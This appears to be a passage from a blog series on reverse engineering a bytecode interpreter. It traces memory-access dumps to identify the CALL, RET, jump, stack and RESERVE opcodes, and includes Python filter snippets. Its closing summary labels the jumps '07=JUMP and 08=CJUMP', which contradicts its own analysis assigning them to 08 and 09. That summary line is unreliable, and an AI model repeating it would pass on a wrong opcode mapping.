Now that we know where the PC is stored, a first step would we to locate the control flow handling instructions. I took all of the ReadInstr lines from the dump and analyzed the PC value to see which instruction was doing jumps, i.e. after which instruction is the PC at least 0x10 more or less than its previous value. I won't paste the script here (it's easy to code but a bit long), but it was of a great use, finding only four instructions modifying the control flow. Opcodes starting by 05, 06, 08 and 09 all modified at least at one time in the dump the value of PC. Looking at the dump, 05 and 06 seems to do a lot of stuff, storing and loading from addresses we don't know about yet, but analyzing the PC after and before those opcodes, we can determine easily enough that they are the usual CALL/RET instructions. For example:

Opcode 05 at 7D48, jumping to 742C
  Opcode 05 at 7434, jumping to 6FA0
    Opcode 05 at 6FB8, jumping to 6D8C
    Opcode 06 at 6D88, jumping to 6FC0
  Opcode 06 at 6F9C, jumping to 743C

See how the jump address from opcode 06 are always just after an opcode 05? Looking at the dump a bit closer, we can also see that op05 writes its next instruction PC somewhere in the interpreter state (let's now call this somewhere "the stack"), and op06 reads it from exactly the same place! Let's look at opcode 08 now in the memory accesses dump:

ReadInstr: 08000000 at pc=00006E24 (@ 80091DBC)
  SetPC: 00006E28 at addr=016E1964 (@ 80091DC8)
{'type':'r', 'size':4, 'addr':'016E0544', 'val': '00000000', 'pc':'800923EC'
{'type':'r', 'size':4, 'addr':'016E053C', 'val': '816D83B4', 'pc':'800923F0'
  GetPC: 00006E28 at addr=016E1964 (@ 800923FC)
SoAccess: type=r val=00006D80 at off=00006E48 (@ 80092400)
  SetPC: 00006E2C at addr=016E1964 (@ 80092408)
{'type':'r', 'size':4, 'addr':'016E0544', 'val': '00000000', 'pc':'8009240C'
  SetPC: 00006D80 at addr=016E1964 (@ 80092418)

So... it reads instruction 8, adds 4 to the PC, reads a word from the bytecode, adds 4 to the PC, then sets the PC to the word read in the bytecode. In other words, after executing 08000000 12345678, PC=12345678. That's an absolute jump, which seems unconditional: every time an opcode 08 is encountered in the dump, PC is modified. That means opcode 09 is most likely a conditional jump: they are almost always used to implement loops and if statements. Two parts of the dump related to opcode 09 seems to confirm that:

ReadInstr: 09000000 at pc=00000500 (@ 80091DBC)
  SetPC: 00000504 at addr=016E1964 (@ 80091DC8)
{'type':'r', 'size':4, 'addr':'016E0544', 'val': '00000000', 'pc':'80092420'
{'type':'r', 'size':4, 'addr':'016E053C', 'val': '816D83B4', 'pc':'80092424'
  GetPC: 00000504 at addr=016E1964 (@ 80092430)
SoAccess: type=r val=00000564 at off=00000524 (@ 80092434)
  SetPC: 00000508 at addr=016E1964 (@ 8009243C)
{'type':'r', 'size':4, 'addr':'016E0544', 'val': '00000000', 'pc':'80092440'
{'type':'r', 'size':4, 'addr':'016E115C', 'val': '00000000', 'pc':'8009244C'
{'type':'r', 'size':4, 'addr':'016E055C', 'val': '00000000', 'pc':'80092458'
  SetPC: 00000564 at addr=016E1964 (@ 80092464)
{'type':'r', 'size':1, 'addr':'016E0558', 'val': '00000000', 'pc':'80091CFC'
{'type':'r', 'size':4, 'addr':'016E0544', 'val': '00000000', 'pc':'80091D38'
{'type':'r', 'size':4, 'addr':'016E1970', 'val': '00000011', 'pc':'80091D44'
{'type':'r', 'size':4, 'addr':'016E0544', 'val': '00000000', 'pc':'80091D78'
{'type':'r', 'size':4, 'addr':'016E1970', 'val': '00000011', 'pc':'80091D84'
{'type':'r', 'size':4, 'addr':'016E0544', 'val': '00000000', 'pc':'80091DA8'
{'type':'r', 'size':4, 'addr':'016E053C', 'val': '816D83B4', 'pc':'80091DAC'

In this case, we jumped to 0564 with the opcode 09000000 00000564. However, another part of the dump shows us that opcode 09 does not always jump:

ReadInstr: 09000000 at pc=000065A4 (@ 80091DBC)
  SetPC: 000065A8 at addr=016E1964 (@ 80091DC8)
{'type':'r', 'size':4, 'addr':'016E0544', 'val': '00000000', 'pc':'80092420'
{'type':'r', 'size':4, 'addr':'016E053C', 'val': '816D83B4', 'pc':'80092424'
  GetPC: 000065A8 at addr=016E1964 (@ 80092430)
SoAccess: type=r val=000065EC at off=000065C8 (@ 80092434)
  SetPC: 000065AC at addr=016E1964 (@ 8009243C)
{'type':'r', 'size':4, 'addr':'016E0544', 'val': '00000000', 'pc':'80092440'
{'type':'r', 'size':4, 'addr':'016E115C', 'val': '00000000', 'pc':'8009244C'
{'type':'r', 'size':4, 'addr':'016E055C', 'val': '00000001', 'pc':'80092458'
{'type':'r', 'size':1, 'addr':'016E0558', 'val': '00000000', 'pc':'80091CFC'
{'type':'r', 'size':4, 'addr':'016E0544', 'val': '00000000', 'pc':'80091D38'
{'type':'r', 'size':4, 'addr':'016E1970', 'val': '00000011', 'pc':'80091D44'
{'type':'r', 'size':4, 'addr':'016E0544', 'val': '00000000', 'pc':'80091D78'
{'type':'r', 'size':4, 'addr':'016E1970', 'val': '00000011', 'pc':'80091D84'
{'type':'r', 'size':4, 'addr':'016E0544', 'val': '00000000', 'pc':'80091DA8'
{'type':'r', 'size':4, 'addr':'016E053C', 'val': '816D83B4', 'pc':'80091DAC'

See the missing SetPC? We can safely assume we know most of the behavior of the four control flow handling instructions: 05=CALL, 06=RET, 07=JUMP and 08=CJUMP. But now, we also know that there is some kind of stack used for CALL/RET. Let's add some new filters to our script in order to detect easily instructions manipulating this stack:

(lambda d: (int(d['addr'], 16) - 0x016E1160) % 5152 == 0
           and int(d['addr'], 16) >= (0x016E195C - 5152)
           and d['type'] == 'r',
 '  GetStackAddr: %(val)s at addr=%(addr)s (@ %(pc)s)',
 'green'),
(lambda d: (int(d['addr'], 16) - 0x016E1160) % 5152 == 0
           and int(d['addr'], 16) >= (0x016E195C - 5152)
           and d['type'] == 'w',
 '  SetStackAddr: %(val)s at addr=%(addr)s (@ %(pc)s)',
 'red'),

(lambda d: (int(d['addr'], 16) - 0x016E1968) % 5152 == 0
           and int(d['addr'], 16) >= 0x016E195C
           and d['type'] == 'r',
 '  GetStackTop: %(val)s at addr=%(addr)s (@ %(pc)s)',
 'green'),
(lambda d: (int(d['addr'], 16) - 0x016E1968) % 5152 == 0
           and int(d['addr'], 16) >= 0x016E195C
           and d['type'] == 'w',
 '  SetStackTop: %(val)s at addr=%(addr)s (@ %(pc)s)',
 'red'),

(lambda d: (int(d['addr'], 16) - 0x016E1164) % 5152 <= 0x800
           and int(d['addr'], 16) >= (0x016E1164)
           and d['type'] == 'r',
 '  GetStack: %(val)s at stack off %(soff)s (addr=%(addr)s @ %(pc)s)',
 'yellow'),
(lambda d: (int(d['addr'], 16) - 0x016E1164) % 5152 <= 0x800
           and int(d['addr'], 16) >= (0x016E1164)
           and d['type'] == 'w',
 '  SetStack: %(val)s at stack off %(soff)s (addr=%(addr)s @ %(pc)s)',
 'cyan'),

Let's re-run our filtering script on the dump and find instructions that access the stack! Opcode 11 seems to be quite small and modifies the stack top, let's look at it more closely:

ReadInstr: 11000000 at pc=0000000C (@ 80091DBC)
  SetPC: 00000010 at addr=016E2D84 (@ 80091DC8)
{'type':'r', 'size':4, 'addr':'016E0544', 'val': '00000001', 'pc':'80092720'
{'type':'r', 'size':4, 'addr':'016E053C', 'val': '816D83B4', 'pc':'80092724'
  GetPC: 00000010 at addr=016E2D84 (@ 80092730)
SoAccess: type=r val=00000008 at off=00000030 (@ 80092734)
  SetPC: 00000014 at addr=016E2D84 (@ 8009273C)
{'type':'r', 'size':4, 'addr':'016E0544', 'val': '00000001', 'pc':'80092740'
  GetStackTop: 000007B8 at addr=016E2D88 (@ 8009274C)
{'type':'r', 'size':4, 'addr':'016E0544', 'val': '00000001', 'pc':'80092764'
  GetStackTop: 000007B8 at addr=016E2D88 (@ 80092770)
  SetStackTop: 000007B0 at addr=016E2D88 (@ 80092778)

ReadInstr: 11000000 at pc=00000158 (@ 80091DBC)
  SetPC: 0000015C at addr=016E1964 (@ 80091DC8)
{'type':'r', 'size':4, 'addr':'016E0544', 'val': '00000000', 'pc':'80092720'
{'type':'r', 'size':4, 'addr':'016E053C', 'val': '816D83B4', 'pc':'80092724'
  GetPC: 0000015C at addr=016E1964 (@ 80092730)
SoAccess: type=r val=00000000 at off=0000017C (@ 80092734)
  SetPC: 00000160 at addr=016E1964 (@ 8009273C)
{'type':'r', 'size':4, 'addr':'016E0544', 'val': '00000000', 'pc':'80092740'
  GetStackTop: 00000794 at addr=016E1968 (@ 8009274C)
{'type':'r', 'size':4, 'addr':'016E0544', 'val': '00000000', 'pc':'80092764'
  GetStackTop: 00000794 at addr=016E1968 (@ 80092770)
  SetStackTop: 00000794 at addr=016E1968 (@ 80092778)

Opcode 11 seems to read an argument just after the bytecode in the file and substracts it from the stack top. For example, 11000000 00000010 removes 0x10 from the stack top. Most of the time this is done to reserve space for local variables (for example, on x86 you do sub esp, 0x10), so let's call this instruction RESERVE. Opcode 10 seems to do almost the same thing but adds to the stack top instead of substracting, so let's call it UNRESERVE.

Another opcode, 0E, seems to write values to the stack and substracts 4 from the stack top each time it does that. In other terms, it pushes a value to the stack. But where does this value come from?

In the next part of this article, I'll talk about the scratchpad, where the temporary variables are stored for computations, and how variables are represented in this interpreter. Stay tuned!